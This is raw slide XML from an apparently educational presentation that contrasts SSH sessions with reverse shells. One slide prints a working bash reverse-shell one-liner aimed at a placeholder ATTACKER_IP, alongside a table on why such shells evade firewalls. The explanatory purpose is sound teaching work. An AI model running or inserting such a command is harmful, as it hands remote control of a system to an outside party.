              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Google Shape;259;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5479542" y="1645920"/>
            <a:ext cx="147447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0" name="Google Shape;260;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5976747" y="1796796"/>
            <a:ext cx="480060" cy="48006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61" name="Google Shape;261;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6039155" y="1859203"/>
            <a:ext cx="355244" cy="355244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Google Shape;262;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5548122" y="2331720"/>
            <a:ext cx="133731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New shell process</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Google Shape;263;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5561838" y="2592324"/>
            <a:ext cx="1309878"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sshd forks your default shell (e.g. bash)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Google Shape;264;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6954012" y="2077974"/>
            <a:ext cx="192024"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60000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>→</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Google Shape;265;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7146036" y="1645920"/>
            <a:ext cx="1474470" cy="1303020"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 421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6" name="Google Shape;266;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643241" y="1796796"/>
            <a:ext cx="480060" cy="48006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267" name="Google Shape;267;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7705649" y="1859203"/>
            <a:ext cx="355244" cy="355244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Google Shape;268;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7214616" y="2331720"/>
            <a:ext cx="133731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A fresh PTY</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Google Shape;269;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7228332" y="2592324"/>
            <a:ext cx="1309878" cy="3429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700"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="6B6560"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>That shell's input/output are wired to a new pseudo-terminal</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Google Shape;270;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="3223260"/>
            <a:ext cx="8161020" cy="4800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1000"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="6B6560"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>The new shell process is the remote shell. It runs on the server's disk and CPU.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Google Shape;271;p22"/>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Anatomy of SSH</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Google Shape;272;p22"/>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277" name="Shape 277"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;278;p23"/>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REVERSE SHELLS</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Google Shape;279;p23"/>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100"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>A shell's I/O can go anywhere. The actual danger.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Google Shape;280;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1200150"/>
            <a:ext cx="816102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000"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E6DFD5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>sshd wires a new shell's input and output to a network socket on purpose, with authentication and encryption. Nothing stops malware from doing the exact same wiring without asking.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Google Shape;281;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1748790"/>
            <a:ext cx="4457700" cy="788670"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 6957" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4D0000"/>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2" name="Google Shape;282;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="1837944"/>
            <a:ext cx="41148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700"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4AD4C4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>REVERSE SHELL, THE CLASSIC ONE-LINER</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Google Shape;283;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="2043684"/>
            <a:ext cx="411480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ourier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/4444 0&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;284;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="2674620"/>
            <a:ext cx="4457700" cy="13030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900"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E6DFD5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>This starts an interactive bash process and redirects its stdin/stdout/stderr to a TCP connection back to the attacker, instead of to a terminal. This is the same file-descriptor wiring, aimed at a listener the attacker controls.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Google Shape;285;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6617970" y="1748790"/>
            <a:ext cx="102870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ambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4AD4C4"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Google Shape;286;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7578090" y="1748790"/>
            <a:ext cx="1268730" cy="24003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88888"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E88888"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5177790" y="2057400"/>
            <a:ext cx="1371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Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Who connects to whom</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;288;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6617970" y="2057400"/>
            <a:ext cx="10287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You dial the server</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7578090" y="2057400"/>
            <a:ext cx="126873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The victim dials the attacker</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Google Shape;290;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5177790" y="2674620"/>
            <a:ext cx="1371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Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6617970" y="2674620"/>
            <a:ext cx="10287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Password or key required</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Google Shape;292;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7578090" y="2674620"/>
            <a:ext cx="126873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None</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Google Shape;293;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5177790" y="3291840"/>
            <a:ext cx="1371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Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Encryption</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Google Shape;294;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6617970" y="3291840"/>
            <a:ext cx="10287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Always</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7578090" y="3291840"/>
            <a:ext cx="126873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Usually none</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;296;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5177790" y="3909060"/>
            <a:ext cx="137160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800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Why it evades firewalls</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6617970" y="3909060"/>
            <a:ext cx="10287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N/A</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Google Shape;298;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7578090" y="3909060"/>
            <a:ext cx="126873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Most networks block inbound, not outbound</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Google Shape;299;p23"/>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Reverse shells</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Google Shape;300;p23"/>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05" name="Shape 305"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Google Shape;306;p24"/>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SCALING IT UP</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Google Shape;307;p24"/>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From one reverse shell to a beacon</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
